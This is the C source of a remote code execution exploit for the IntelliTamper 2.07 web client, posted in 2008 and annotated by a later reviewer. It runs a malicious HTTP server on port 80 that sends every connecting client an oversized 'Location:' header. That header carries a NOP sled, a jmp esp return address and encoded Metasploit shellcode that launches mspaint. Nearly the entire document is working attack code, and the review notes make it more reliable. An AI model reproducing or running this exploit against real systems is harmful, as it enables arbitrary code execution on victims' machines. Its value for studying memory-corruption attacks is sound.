
intellitamper207-header.txt

Posted on 13 August 2008

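/*
 * IntelliTamper 2.07 "Location:" HTTP header remote code execution exploit.
 *
 * Based on the exploit by Koshi (written in Perl); this one should be more
 * stable.  Just for fun and to learn more about win32 exploitation.
 *
 * by Wojciech Pawlikowski (wojtekp@gmail.com)
 *
 * What it does: listens on TCP/80 and answers every client with an HTTP
 * response whose "Location:" header is ~1.5 KB long.  The original comment
 * and the "jmp esp" return address indicate a classic stack overflow in the
 * client's handling of that header: the saved return address is replaced by
 * the gadget, ESP then points just past it at a short backward jmp, which
 * lands in the NOP sled in front of the shellcode.
 *
 * Review notes:
 *   - The web page this listing was recovered from stripped the backslash
 *     from every escape sequence ("xeb" for "\xeb", CR/LF separators lost).
 *     The byte strings and the header separators below were reconstructed
 *     from that; the shellcode length (336) matches the msf comment.
 *   - RETADDR is the address of "jmp esp" in one specific ntdll.dll build
 *     (pre-ASLR era).  Verify it against the target's ntdll before use; on
 *     any ASLR-enabled Windows a fixed address will not hold.
 *   - The payload launches mspaint.exe (EXITFUNC=thread): a harmless PoC.
 *   - Binding port 80 needs root.  The listener attacks every client that
 *     connects and runs until killed.
 */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE        1550
#define NOP            0x90
#define RETADDR        0x7c941EEDu   /* jmp esp, ntdll.dll -- build-specific! */

/* Offsets inside the overflow string; they reproduce the original layout
 * (RETADDR written over the whole buffer, NOPs over the first 1536 bytes,
 * shellcode inside the sled, a 5-byte jmp right after the return slot). */
#define NOP_LEN        1536               /* [0,1536): NOP sled               */
#define SHELLCODE_OFF  550                /* shellcode sits inside the sled   */
#define RET_OFF        NOP_LEN            /* [1536,1540): saved EIP slot      */
#define JMP_OFF        (NOP_LEN + 4)      /* [1540,1545): jmp back into sled  */
#define JMP_LEN        5
#define PAYLOAD_LEN    (JMP_OFF + JMP_LEN)   /* 1545 bytes after "Location: " */

/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2
 * http://metasploit.com
 * Alphanumeric (Alpha2) encoding with a GetPC stub: no NUL, CR or LF bytes,
 * so it survives being carried in an HTTP header. */
static const unsigned char shellcode[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    "\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
    "\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
    "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
    "\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
    "\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
    "\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
    "\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
    "\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
    "\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
    "\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
    "\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
    "\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
    "\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
    "\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
    "\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
    "\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
    "\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
    "\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
    "\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
    "\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";

_Static_assert(sizeof shellcode - 1 == 336, "shellcode size must match the msf comment");
_Static_assert(SHELLCODE_OFF + sizeof shellcode - 1 <= RET_OFF,
               "shellcode must fit inside the NOP sled");
_Static_assert(PAYLOAD_LEN <= BUFSIZE, "payload must fit the overflow buffer");

/* Response framing.  HTTP needs CRLF between header lines and an empty line
 * to terminate them; the listing lost those escapes, they are restored here.
 * The field order of the status line is kept exactly as published. */
static const char HDR_PREFIX[] =
    "200 HTTP/1.1\r\n"
    "Date: 2008-07-24 20:14:31\r\n"
    "Location: ";
static const char HDR_END[] = "\r\n\r\n";

/* Store a 32-bit value little-endian (x86 target) without aliasing the
 * buffer through a `long`, whose width differs between 32/64-bit hosts. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xffu);
    p[1] = (unsigned char)((v >> 8) & 0xffu);
    p[2] = (unsigned char)((v >> 16) & 0xffu);
    p[3] = (unsigned char)((v >> 24) & 0xffu);
}

/* Fill `out` with the overflow string and return its length (PAYLOAD_LEN),
 * or 0 if `cap` is too small.  Layout, low to high offsets:
 *   [0, NOP_LEN)            NOP sled, shellcode placed at SHELLCODE_OFF
 *   [RET_OFF, RET_OFF+4)    RETADDR, little-endian -> "jmp esp"
 *   [JMP_OFF, JMP_OFF+5)    jmp rel32 -1004 (e9 14 fc ff ff): ESP points here
 *                           after the ret; it lands at offset 541, inside the
 *                           sled just before the shellcode
 * Nothing beyond PAYLOAD_LEN is written, and the caller must send exactly
 * PAYLOAD_LEN bytes: the original took strlen() of a heap buffer it never
 * terminated, which over-reads uninitialised memory. */
static size_t build_payload(unsigned char *out, size_t cap)
{
    if (cap < PAYLOAD_LEN)
        return 0;
    memset(out, NOP, NOP_LEN);
    memcpy(out + SHELLCODE_OFF, shellcode, sizeof shellcode - 1);
    put_le32(out + RET_OFF, RETADDR);
    memcpy(out + JMP_OFF, "\xe9\x14\xfc\xff\xff", JMP_LEN);
    return PAYLOAD_LEN;
}

/* Assemble prefix + payload + terminator into `out`; return the total length
 * or 0 if it would not fit in `cap`.  Length is tracked explicitly so that a
 * payload byte of 0x00 could never truncate the response. */
static size_t build_response(char *out, size_t cap,
                             const unsigned char *payload, size_t payload_len)
{
    const size_t pre = sizeof HDR_PREFIX - 1;
    const size_t end = sizeof HDR_END - 1;

    if (cap < pre + end || payload_len > cap - pre - end)
        return 0;
    memcpy(out, HDR_PREFIX, pre);
    memcpy(out + pre, payload, payload_len);
    memcpy(out + pre + payload_len, HDR_END, end);
    return pre + payload_len + end;
}

/* write(2) the whole buffer, retrying on short writes and EINTR.
 * Returns 0 on success, -1 with errno set on failure. */
static int write_all(int fd, const char *p, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

int main(void)
{
    unsigned char overflow[BUFSIZE + 1];
    char req[BUFSIZE + 100];
    struct sockaddr_in serv_sin;
    int sock_opt = 1;

    /* The response is identical for every client: build it once, on the
     * stack, instead of malloc()ing (and leaking) a copy per connection. */
    size_t payload_len = build_payload(overflow, sizeof overflow);
    size_t req_len = payload_len
                   ? build_response(req, sizeof req, overflow, payload_len)
                   : 0;
    if (req_len == 0) {
        fputs("[-] internal error: payload does not fit its buffer\n", stderr);
        exit(-1);
    }

    int sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sockfd < 0) {
        perror("socket()");
        exit(-1);
    }

    memset(&serv_sin, 0, sizeof serv_sin);   /* sin_zero was left uninitialised */
    serv_sin.sin_family = AF_INET;
    serv_sin.sin_port = htons(80);
    serv_sin.sin_addr.s_addr = INADDR_ANY;

    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof sock_opt) < 0) {
        perror("setsockopt()");
        close(sockfd);
        exit(-1);
    }
    if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof serv_sin) < 0) {
        perror("bind()");
        close(sockfd);
        exit(-1);
    }
    if (listen(sockfd, 1) < 0) {
        perror("listen()");
        close(sockfd);
        exit(-1);
    }

    printf("[*] Waiting for a connection...\n");
    fflush(stdout);   /* stdout may be block-buffered; show it before blocking in accept() */

    for (;;) {
        struct sockaddr_in cli_sin;
        socklen_t sin_len = sizeof cli_sin;   /* accept() updates it: reset per call */
        char buf[BUFSIZE];

        int cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
        if (cli_sock < 0) {
            if (errno == EINTR)
                continue;
            perror("accept()");
            close(sockfd);
            exit(-1);
        }
        printf("[+] Connection from %s:%d\n",
               inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));

        /* Drain whatever the client sent; its content is never looked at. */
        if (read(cli_sock, buf, sizeof buf - 1) < 0)
            perror("read()");

        if (write_all(cli_sock, req, req_len) < 0)
            perror("write()");
        else
            printf("[+] Exploit sent!\n");
        fflush(stdout);
        close(cli_sock);
    }
}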

 
